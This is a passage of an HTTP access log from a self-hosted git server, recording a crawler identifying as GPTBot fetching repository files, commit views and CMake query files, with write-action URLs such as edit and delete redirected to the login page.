- GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:17:30:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 725] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:17:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11633] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:17:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10299] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10299] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10050] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" -[17/Feb/2026:17:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10290] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10298] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12992] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" -[17/Feb/2026:17:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:17:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14676] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" -[17/Feb/2026:17:31:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9956] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10119] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11345] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11344] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11346] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11345] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10305] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9999] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10003] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api" -[17/Feb/2026:17:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake" -[17/Feb/2026:17:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10002] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9997] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10258] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10260] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11346] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10259] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr 